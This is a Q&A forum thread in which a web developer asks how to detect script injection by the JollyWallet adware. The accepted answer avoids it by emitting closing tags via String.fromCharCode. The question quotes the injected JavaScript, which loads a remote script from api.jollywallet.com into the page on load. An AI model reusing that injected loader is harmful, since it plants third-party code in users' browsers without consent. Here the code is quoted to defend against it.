Identifying if code injection occurred (JollyWallet, etc)

Question

We are looking to alert a user if code injection has occurred while the page is loading. We are having an issue where JollyWallet injects code and causes a SCRIPT block to remain open. Of course our code is in that SCRIPT block.

Here is what we have in the original

sTrailer = "</body></html>"  //Used to close popup print view window

Here is what gets injected:

sTrailer = "<script type="text/javascript">(function () {if (top.location == self.location && top.location.href.split('#')[0] == 'https://www.xxxxxxx.net/xxx/xxx/<filename>.asp?account=###############') {var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;po.src = 'https://api.jollywallet.com/affiliate/client?dist=213&sub=bsg-rt-revenyou&name=BrowserSafeguard';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);}})();</script></body></html>"

Optimally, we would like to alert the user as to the presence of this PUP when they log into our site. Optionally, we would like to stop the injection on the affected pages.

Does anyone know of a test that could be run at the end of the page load that would identify the code injection?

Just to let you know we are seeing this as well. Haven't found out much yet. — Tom Winter, Nov 24 '14 at 17:06

score 0 · Accepted Answer · answered Jun 11 '15 at 21:29

0

Sorry I forgot to post the fix to this. I ended writing the elements from charCode as the malware was looking for specific text.

winPrintView.document.write(String.fromCharCode(60, 47, 98, 111, 100, 121, 62, 60, 47, 104, 116, 109, 108, 62));

answered Jun 11 '15 at 21:29

Walter

21
7

Identifying if code injection occurred (JollyWallet, etc)

1 Answers1